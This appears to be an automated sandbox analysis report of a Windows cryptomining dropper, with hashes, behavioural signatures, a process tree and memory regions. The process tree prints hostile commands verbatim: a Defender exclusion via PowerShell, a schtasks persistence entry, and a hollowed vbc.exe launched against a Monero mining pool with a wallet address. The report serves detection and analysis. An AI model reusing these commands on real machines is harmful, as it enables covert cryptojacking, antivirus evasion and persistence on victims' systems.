Analysis
-
max time kernel
188s -
max time network
188s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2022 19:35
Static task
static1
Behavioral task
behavioral1
Sample
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
Resource
win7-20221111-en
General
-
Target
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe
-
Size
648KB
-
MD5
4f17d8dcc61d0dea7dd6c4cd0162b246
-
SHA1
d3a2505f416a32ed98e71117db7188cf1a464c5d
-
SHA256
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
-
SHA512
c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
SSDEEP
12288:cm+6CtnUrur4tohP1aYZKHbncTnCQB6X/MJiY:x+rpX0tohhZKb+YM
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1704-186-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-187-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/1704-188-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-189-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-191-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/1704-194-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
Processes:
YHKO.exepid process 2412 YHKO.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
YHKO.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation YHKO.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
YHKO.exedescription pid process target process PID 2412 set thread context of 1704 2412 YHKO.exe vbc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2460 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exepid process 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe 4148 powershell.exe 4148 powershell.exe 2412 YHKO.exe 2412 YHKO.exe 4636 powershell.exe 4636 powershell.exe 2412 YHKO.exe 2412 YHKO.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exepowershell.exeYHKO.exepowershell.exevbc.exedescription pid process Token: SeDebugPrivilege 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe Token: SeDebugPrivilege 4148 powershell.exe Token: SeDebugPrivilege 2412 YHKO.exe Token: SeDebugPrivilege 4636 powershell.exe Token: SeLockMemoryPrivilege 1704 vbc.exe Token: SeLockMemoryPrivilege 1704 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
vbc.exepid process 1704 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.execmd.exeYHKO.execmd.exedescription pid process target process PID 2216 wrote to memory of 4148 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe powershell.exe PID 2216 wrote to memory of 4148 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe powershell.exe PID 2216 wrote to memory of 1000 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe cmd.exe PID 2216 wrote to memory of 1000 2216 7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe cmd.exe PID 1000 wrote to memory of 2460 1000 cmd.exe timeout.exe PID 1000 wrote to memory of 2460 1000 cmd.exe timeout.exe PID 1000 wrote to memory of 2412 1000 cmd.exe YHKO.exe PID 1000 wrote to memory of 2412 1000 cmd.exe YHKO.exe PID 2412 wrote to memory of 4636 2412 YHKO.exe powershell.exe PID 2412 wrote to memory of 4636 2412 YHKO.exe powershell.exe PID 2412 wrote to memory of 1724 2412 YHKO.exe cmd.exe PID 2412 wrote to memory of 1724 2412 YHKO.exe cmd.exe PID 1724 wrote to memory of 1080 1724 cmd.exe schtasks.exe PID 1724 wrote to memory of 1080 1724 cmd.exe schtasks.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe PID 2412 wrote to memory of 1704 2412 YHKO.exe vbc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"C:\Users\Admin\AppData\Local\Temp\7a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp275E.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\ProgramData\dlllib\YHKO.exe"C:\ProgramData\dlllib\YHKO.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "YHKO" /tr "C:\ProgramData\dlllib\YHKO.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\dlllib\YHKO.exeFilesize
648KB
MD54f17d8dcc61d0dea7dd6c4cd0162b246
SHA1d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA2567a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
C:\ProgramData\dlllib\YHKO.exeFilesize
648KB
MD54f17d8dcc61d0dea7dd6c4cd0162b246
SHA1d3a2505f416a32ed98e71117db7188cf1a464c5d
SHA2567a90312b845d684d8f0a2ae95cfc5f616d00dd25cbcb172335a36dd90c3340c0
SHA512c4364d742f83dde0aec4a6120f5521bfff3df7e522eb43a3c9bcca6f3fbf3fdd000edb6aeceb2e4c84bebea46a6a3b110f538a982ce41919fb9f8da88ece98b2
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Temp\tmp275E.tmp.batFilesize
139B
MD53e99e38f5daa44be300a6723ed320a98
SHA1d76f9d4031ee4da0875d68568b8d872f06ed8093
SHA25673bee727201c07029f8f8ee907a60c6ecebff01f7484575e105830fe5edb65e4
SHA512896011a739f041574f1b32c912cfcb053f4094e666817b3291ae2a757fc56e90c354c6ed5c5fd19b34bf81b0d2e00d9d253c29720db1591655a0eaa55a30377b
-
memory/1000-146-0x0000000000000000-mapping.dmp
-
memory/1080-177-0x0000000000000000-mapping.dmp
-
memory/1704-188-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1704-186-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1704-187-0x0000000140343234-mapping.dmp
-
memory/1704-197-0x000001B09A6E0000-0x000001B09A700000-memory.dmpFilesize
128KB
-
memory/1704-189-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1704-190-0x000001B09A540000-0x000001B09A560000-memory.dmpFilesize
128KB
-
memory/1704-191-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1704-194-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/1704-195-0x000001B09A580000-0x000001B09A5C0000-memory.dmpFilesize
256KB
-
memory/1704-196-0x000001B09A700000-0x000001B09A720000-memory.dmpFilesize
128KB
-
memory/1704-199-0x000001B09A6E0000-0x000001B09A700000-memory.dmpFilesize
128KB
-
memory/1704-198-0x000001B09A700000-0x000001B09A720000-memory.dmpFilesize
128KB
-
memory/1724-175-0x0000000000000000-mapping.dmp
-
memory/2216-136-0x00007FFA4BC30000-0x00007FFA4BCED000-memory.dmpFilesize
756KB
-
memory/2216-149-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmpFilesize
10.8MB
-
memory/2216-148-0x0000000000C00000-0x0000000000C43000-memory.dmpFilesize
268KB
-
memory/2216-147-0x0000000000E80000-0x0000000000F88000-memory.dmpFilesize
1.0MB
-
memory/2216-144-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmpFilesize
10.8MB
-
memory/2216-143-0x00007FFA48B90000-0x00007FFA48CDE000-memory.dmpFilesize
1.3MB
-
memory/2216-142-0x0000000000E80000-0x0000000000F88000-memory.dmpFilesize
1.0MB
-
memory/2216-141-0x00007FFA68350000-0x00007FFA6837B000-memory.dmpFilesize
172KB
-
memory/2216-140-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmpFilesize
10.8MB
-
memory/2216-139-0x00007FFA685C0000-0x00007FFA68761000-memory.dmpFilesize
1.6MB
-
memory/2216-138-0x0000000000C00000-0x0000000000C43000-memory.dmpFilesize
268KB
-
memory/2216-137-0x0000000000E80000-0x0000000000F88000-memory.dmpFilesize
1.0MB
-
memory/2216-135-0x00007FFA64470000-0x00007FFA64482000-memory.dmpFilesize
72KB
-
memory/2216-134-0x00007FFA682B0000-0x00007FFA6834E000-memory.dmpFilesize
632KB
-
memory/2216-133-0x00007FFA4BD80000-0x00007FFA4BE2A000-memory.dmpFilesize
680KB
-
memory/2412-168-0x0000000000380000-0x0000000000488000-memory.dmpFilesize
1.0MB
-
memory/2412-184-0x0000000003220000-0x0000000003263000-memory.dmpFilesize
268KB
-
memory/2412-155-0x0000000000000000-mapping.dmp
-
memory/2412-159-0x00007FFA4AD80000-0x00007FFA4AE2A000-memory.dmpFilesize
680KB
-
memory/2412-173-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB
-
memory/2412-160-0x00007FFA682B0000-0x00007FFA6834E000-memory.dmpFilesize
632KB
-
memory/2412-193-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB
-
memory/2412-169-0x00007FFA4AB70000-0x00007FFA4ACBE000-memory.dmpFilesize
1.3MB
-
memory/2412-167-0x00007FFA68350000-0x00007FFA6837B000-memory.dmpFilesize
172KB
-
memory/2412-178-0x00007FFA66D10000-0x00007FFA66D37000-memory.dmpFilesize
156KB
-
memory/2412-179-0x00007FFA4A930000-0x00007FFA4A965000-memory.dmpFilesize
212KB
-
memory/2412-180-0x00007FFA49490000-0x00007FFA49592000-memory.dmpFilesize
1.0MB
-
memory/2412-181-0x00007FFA67D30000-0x00007FFA67D9B000-memory.dmpFilesize
428KB
-
memory/2412-182-0x00007FFA65920000-0x00007FFA6595B000-memory.dmpFilesize
236KB
-
memory/2412-183-0x0000000000380000-0x0000000000488000-memory.dmpFilesize
1.0MB
-
memory/2412-192-0x0000000000380000-0x0000000000488000-memory.dmpFilesize
1.0MB
-
memory/2412-185-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB
-
memory/2412-166-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB
-
memory/2412-165-0x00007FFA685C0000-0x00007FFA68761000-memory.dmpFilesize
1.6MB
-
memory/2412-163-0x0000000003220000-0x0000000003263000-memory.dmpFilesize
268KB
-
memory/2412-164-0x00007FFA4ACC0000-0x00007FFA4AD7D000-memory.dmpFilesize
756KB
-
memory/2412-162-0x0000000000380000-0x0000000000488000-memory.dmpFilesize
1.0MB
-
memory/2412-161-0x00007FFA64470000-0x00007FFA64482000-memory.dmpFilesize
72KB
-
memory/2460-152-0x0000000000000000-mapping.dmp
-
memory/4148-153-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmpFilesize
10.8MB
-
memory/4148-150-0x00000272FE2F0000-0x00000272FE312000-memory.dmpFilesize
136KB
-
memory/4148-145-0x0000000000000000-mapping.dmp
-
memory/4148-154-0x00007FFA4A920000-0x00007FFA4B3E1000-memory.dmpFilesize
10.8MB
-
memory/4636-170-0x0000000000000000-mapping.dmp
-
memory/4636-176-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB
-
memory/4636-174-0x00007FFA49850000-0x00007FFA4A311000-memory.dmpFilesize
10.8MB